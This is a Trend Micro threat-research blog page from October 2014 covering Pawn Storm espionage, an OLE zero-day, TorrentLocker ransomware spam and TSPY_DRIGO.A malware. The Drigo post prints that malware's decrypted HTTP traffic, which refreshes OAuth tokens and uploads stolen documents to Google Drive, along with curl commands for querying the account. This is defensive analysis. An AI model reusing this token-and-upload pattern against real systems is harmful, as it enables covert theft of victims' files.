Trend Micro Facebook TrendLabs Twitter Malware Blog RSS Feed You Tube - Trend Micro
Search our blog:

  • Recent Posts

  • Calendar

    October 2014
    S M T W T F S
    « Sep    
  • About Us

    Pawn Storm is an active economic and political cyber-espionage operation targeting a wide range of entities, mostly those related to the military, governments, and media. Specific targets include:

    • Military agencies, embassies, and defense contractors in the US and its allies
    • Opposition politicians and dissidents of the Russian government
    • International media
    • The national security department of a US ally

    The cyber criminals behind Operation Pawn Storm are using several different attack scenarios: spear-phishing emails with malicious Microsoft Office documents lead to SEDNIT/Sofacy malware, very selective exploits injected into legitimate websites that will also lead to SEDNIT/Sofacy malware, and phishing emails that redirect victims to fake Outlook Web Access login pages.

    A Closer Look at SEDNIT

    Our investigation into Pawn Storm has shown that the attackers have done their homework. Their choices of targets and the use of SEDNIT malware indicate the attackers are very experienced; SEDNIT has been designed to penetrate their targets’ defenses and remain persistent in order to capture as much information as they can.


    Figure 1. Phases 1 and 2 in an Operation Pawn Storm attack

    The spear phishing emails sent by Pawn Storm attacks can be aimed at very specific targets. In one example, a spear phishing email was sent to only 3 employees of the legal department of a billion-dollar multinational firm. The e-mail addresses of the recipients are not advertised anywhere online. The company in question was involved in an important legal dispute, so this shows a clear economic espionage motive of the attackers. Luckily nobody clicked on the link in the spear phish e-mail and Trend Micro was able to warn the company in an early stage, thus preventing any further damage.

    This attack, however, is just one of the many attacks launched, and there will surely be more. The attackers behind Operation Pawn Storm have been active since at least 2007 and they continue to launch new campaigns. Just in June 2014 they compromised government websites in Poland and in September 2014 the website for Power Exchange in Poland,, by inserting a malicious iframe pointing to an exploit server at yovtube[dot]co and defenceiq[dot]us. The exploit server was however very selective in infecting victims with SEDNIT, so that SEDNIT malware only got installed on selected systems.

    Another technique used by the Pawn Storm attackers is a very clever phishing attack that specifically targets Outlook Web Access users. We will discuss that part in another entry that we will release soon. In the mean time, check the full details of our research in our paper: Operation Pawn Storm.

    Email this story to a friend   Technorati   NewsVine   MySpace   Google   Live   StumbleUpon  

    Microsoft has disclosed that a new zero-day vulnerability is present in Windows, and is exploited via Microsoft Office files. According to Microsoft Security Advistory 3010060, the vulnerability is present in all supported versions of Windows except Windows Server 2003.

    The vulnerability (designated as CVE-2014-6352) is triggered by an attacker sending a specially crafted Microsoft Office file to the user. Currently, attacks using PowerPoint files are known to exist, but all Office file types can be used to carry out this attack.

    The specially crafted files contain a malicious Object Linking and Embedding (OLE) object. This technology is used to share data between various applications; it is in this component of Windows where this vulnerability may be found. Exploiting it allows for malicious code to run with the privileges of the user. To get administrator access, a separate exploit must be used. In addition, under default settings a User Access Control popup is displayed, which may alert the user that something unusual is going on.

    Currently, Microsoft has not indicated whether a patch to solve this issue will be sent outside of the regular Patch Tuesday cycle. Until more definitive information becomes available, we advise users to be careful about opening Office documents that they have been sent, particularly if they come from parties that have not sent you documents beforehand. The Microsoft bulletin also includes several workarounds and temporary fixes, including settings for users of the Enhanced Mitigation Experience Toolkit (EMET) utility.

    Update as of October 24, 2014, 7:30 P.M. PDT

    Currently available information suggests that this vulnerability is essentially identical to the Sandworm vulnerability, which was reported and patched more than a week ago. The patch first put in place by Microsoft did not completely resolve the problem, allowing new exploits to target the same underlying flaw.

    Deep Security solutions that protect against Sandworm also protect against these more recent attacks. The following DPI rules cover these threats:

    • 1006290 - Microsoft Windows OLE Remote Code Execution Vulnerability (CVE-2014-4114)
    • 1006291 - Microsoft Windows OLE Remote Code Execution Vulnerability (CVE-2014-4114) – 1
    Email this story to a friend   Technorati   NewsVine   MySpace   Google   Live   StumbleUpon  

    We recently observed a new ransomware variant, TorrentLocker, that was targeted at nearly 4,000 organizations and enterprises, many of which are located in Italy. TorrentLocker is similar to an earlier ransomware family (CryptoLocker), and also encrypts various files and forces users to pay a sum of money. TorrentLocker uses the TOR anonymity network to hide its network traffic, which may have been the origin of its name.

    The said threat used spam email written in Italian with several templates as part of its social engineering tactics. Translated into English, these messages read:

    1. Your question has been asked on the forum {day}/{month}/{year} {time}. Detailed answer refer to the following address: {malicious link}
    2. He sent a bill that would have paid before {day}/{month}/{year}. Details found: {malicious link}
    3. Your request has been initiated to revise the payment {malicious link}

    Figure 1. Sample spam email

    All the messages contain a link that points to .ZIP file. Decompressing the archive file yields a file disguise as .PDF document. PDF files are commonly passed around within organizations, and as such, employees who received this spammed message may be trick into thinking that it is legitimate.

    Figure 2. Screenshot of the linked archive file

    Some of the archive files have filenames such as,,, or These file names translate to paymenttransactioncompensation, and balance, respectively. However, instead of a PDF file, these files are actually a CryptoLocker variant detected by Trend Micro as TROJ_CRILOCK.YNG.

    Similar to other Cryptolocker variants, it encrypts a wide variety of file types including .DOTX, .DOCX,.DOC, .TXT, .PPT, .PPTX, and .XLSX, among others. All of these file types are associated with Microsoft Office products and are commonly used in enterprises in daily operations.

    In order to receive the decryptor tool to supposedly retrieve crucial files of users, they need to pay the ransom in Bitcoins. One of the samples we found asked for a ransom of 1.375 BTC, which is worth around  $500, a type of digital currency.



    Figures 3 and 4. Screenshots of ransomware (Click to enlarge)

    Italian users are the most affected by this particular spam run, as just over half of all spam messages identified with this spam run were sent to users in Italy. A quarter came from Brazil, with other countries accounting for the remainder. At its peak, several thousand users were affected per day.

    Figure 5. Distribution of TorrentLocker targets globally

    Figure 6. Number of affected targets per day

    We protect our users against this threat by blocking the different facets of this threat. In addition to blocking the various spam messages, we also block the malicious URLs and detect the malicious files used in this attack.

    The hashes of the file seen in this attack include:

    • 050b21190591004cbee3a06019dcb34e766afe47
    • 078838cb99e31913e661657241feeea9c20b965a
    • 6b8ba758c4075e766d2cd928ffb92b2223c644d7
    • 9a24a0c7079c569b5740152205f87ad2213a67ed
    • c58fe7477c0a639e64bcf1a49df79dee58961a34
    • de3c25f2b3577cc192cb33454616d22718d501dc

    Additional information provided by Grant Chen

    Email this story to a friend   Technorati   NewsVine   MySpace   Google   Live   StumbleUpon  

    Using cloud-based sharing sites is not a new routine for bad guys. Aside from providing free storage for their malicious files, these legitimate sites are used to evade security vendors and researchers.

    We have seen malware that have taken advantage of these sites, such as DropBox, Sendspace, and Evernote. We can now include Google Drive to the list of “abused” sites. We recently came across malware, detected as TSPY_DRIGO.A, that uses Google Drive as one way of siphoning information from its victims.

    Access to Google Drive

    Once executed, the malware will check for the following file types in certain locations to upload them into Google Drive:

    • XLSX
    • XLS
    • DOC
    • DOCX
    • PDF
    • TXT
    • PPT
    • PPTX

    The locations where the malware checks for files include the Recycle Bin and the User Documents folder.

    In order to upload the files to Google Drive, the client_id and client_secret were embedded on the malware, together with a refresh token. Refresh tokens are needed as part of the OAuth 2.0 protocol, which is used by Google Drive. This protocol is used by Twitter, Facebook and other sites to use their accounts to log in to a different website. Access tokens are used to have access on a Google Drive account. However, access tokens expire so refresh tokens are needed to get new access tokens.

    We decrypted communication from the malware and saw activity such as requests for new tokens and uploading files.

    ; request for new token

    POST /o/oauth2/token HTTP/1.1
    User-Agent: Go 1.1 package http
    Content-Length: 208
    Content-Type: application/x-www-form-urlencoded
    Accept-Encoding: gzip

    client_id={REMOVED} {REMOVED}&grant_type=refresh_token&refresh_token={REMOVED}

    ;reply for new token

    HTTP/1.1 200 OK
    Content-Type: application/json; charset=utf-8
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Fri, 01 Jan 1990 00:00:00 GMT
    Date: Thu, 14 Oct 2014 08:08:32 GMT
    Content-Disposition: attachment; filename=”sample.txt”; filename*=UTF-8”sample.txt
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    X-XSS-Protection: 1; mode=block
    Server: GSE
    Alternate-Protocol: 443:quic
    Transfer-Encoding: chunked

    “access_token” : “{REMOVED}”,
    “token_type” : “Bearer”,
    “expires_in” : 3600

    ;upload file

    POST /upload/drive/v2/files?alt=json&uploadType=multipart HTTP/1.1
    User-Agent: google-api-go-client/0.5
    Content-Length: 398
    Authorization: OAuth {REMOVED}

    Content-Type: multipart/related; boundary=e0cee80c4f3d21e18e77548a60b374408ce65bc3b76c5de1cdbe2afe7eeb
    Accept-Encoding: gzip

    We used this same approach in order to check the files uploaded in the Google Drive account. As of this writing, some of the files are still “active” or present in the account. We’ve also found that the file names reveal the targeted entities, which are mostly government agencies.

    Below is the command line used for testing:

    ;Request new token
    Curl –d “cliend_id={CLIENT_ID}&client_secret={SECRET_KEY}&grant_type=refresh_token&refresh_token={REFRESH_TOKEN}

    ;List files
    Curl –H “Authorization: OAuth {ACCESS_TOKEN}”

    Here’s an excerpt of the log from the Google Drive account on one of the files uploaded:

    “kind”: “drive#file”,
    “title”: “{HOSTNAME} C:\\Users\\{USERNAME}\\AppData\\Roaming\\{REMOVED}長致詞{REMOVED}.doc”,
    “mimeType”: “application/”,
    “createdDate”: “2014-10-16T10:13:14.339Z”,
    “modifiedDate”: “2014-10-16T10:13:16.286Z”,
    “modifiedByMeDate”: “2014-10-16T10:13:16.286Z”,
    “lastViewedByMeDate”: “2014-10-16T10:13:16.286Z”,
    “markedViewedByMeDate”: “1970-01-01T00:00:00.000Z”,

    The Other Google Connection

    Use of Google Drive isn’t the only thing that connects this malware to Google. The malware was actually created using the Go programming language, commonly known as golang. This is an open source programming language that was initially developed by Google. According to Google, “the goals of the Go project were to eliminate the slowness and clumsiness of software development at Google, and thereby to make the process more productive and scalable.”

    While interesting, the use of golang is not new; security researchers have seen golang-created malware as early as 2012. It would be hard to pinpoint the exact reason for using golang but some have attributed its appeal to its supposed lack of mainstream profile.

    Gathering Information

    Our analysis shows that this malware can only upload document-type files to Google Drive. This type of malware routine is perfect for reconnaissance—one of the earlier stages for targeted attacks. After all, one of the key aspects in a successful attack is having enough information on the target. The more information they can gather, the more vector of attack they can use on their target.

    The following hashes are related to this attack:

    • 2C32674B334F10000CB63ED4BA4EE543A16D8572
    • 2D98DDF8F5128853DD33523BCBBD472B8D362705

    Trend Micro secures enterprises via its Custom Defense solution that provides advanced threat protection by performing network-wide monitoring to detect zero-day malware, malicious communications, and attacker behaviors invisible to standard solutions.

    We have already notified Google about this incident.

    With additional insight from Ronnie Giagone, Dove Chiu, and Vico Fang.


    Email this story to a friend   Technorati   NewsVine   MySpace   Google   Live   StumbleUpon  

    Recent data breaches in big enterprises like large banks and retail chains make one thing clear: data privacy and protection is a concern for all organizations, not just large ones. If  large enterprises with plenty of available resources can be affected by attacks and lose their data, smaller organizations without these resources are at risk as well.

    Users are not just worried about whether their data is secure; today they are also worrying if their data will be used properly by the sites and businesses they deal with. The concern among users about privacy has increased in months and years.

    The statistics bear this all out. A survey carried out in March 2014 by the market research firm GfK highlighted significant, and growing, concerns from consumers about their personal data. 49% of respondents said they were “very much” concerned about how their data was protected, with 60% of respondents saying this concern had increased in the past 12 months.

    Consumers are also taking action. A 2014 study by Radius Global found that 69% of survey respondents would do less business with a company they knew had been breached; 67% would try to only do business with companies that they feel can handle their data. The consequences for companies are clear.

    So, what should companies do? First of all, they need to recognize that data protection is now an important a part of doing business. This means that they must actually approach this as something that is important, and not just a pain that has to be tolerated.

    To do this, organizations should first take stock and remember just what they are protecting and consider what’s most important – i.e., what is their core data. These should be protected with the best available resources. Keep in mind that the levels of protection necessary can change, depending on regulations (like the soon-to-be-implemented data protection regulations in the European Union).

    Local regulations on data protection can vary significantly. In the United States, there are no comprehensive law that covers all sectors. Instead, per-industry legislation such as the Health Insurance Portability and Accountability Act (HIPAA) are in place.

    In other countries, more comprehensive regulations that cover all sectors are more common. For example, countries in the European Union will soon be covered by the EU General Data Protection Regulation, which mandates EU-wide rules on data protection. Japan has similar laws in the form of the Act on the Protection of Personal Information, which dates back to 2003.

    However, not all organizations actually understand these regulations: in the EU, only 13% of businesses called their understanding of the upcoming regulations “very good”.  This is despite the fact that, for example, in the EU businesses can be fined up to 5% of their annual turnover if they are in violation of the proposed regulations.

    Similar approaches need to be taken to assuage concerns about privacy. Ensure that what data is being collected is used correctly and in such a way as not to be perceived as “creepy” by end users. The same data protection that is done for core data must be applied here, too: end users will not take kindly to businesses that don’t protect the data of their customers.

    In the end, data protection comes down not just to technical aspects, but for organizations to decide that it matters. With the new year fast approaching, companies can learn from the many incidents of 2014 and ensure that their own organizations do not fall victim to similar attacks. To know more about data protection law, read our infographic, The Road to Compliance: A Visual Guide to the EU Data Protection Law.

    Trend Micro secures user’s data via its integrated data loss prevention technology that protects data found in endpoints, servers, networks, and even the cloud. It also protects the transfer of data between locations and comes with a central policy management, which does not require installation of different technologies across multiple security layers.

    Email this story to a friend   Technorati   NewsVine   MySpace   Google   Live   StumbleUpon  


    © Copyright 2013 Trend Micro Inc. All rights reserved. Legal Notice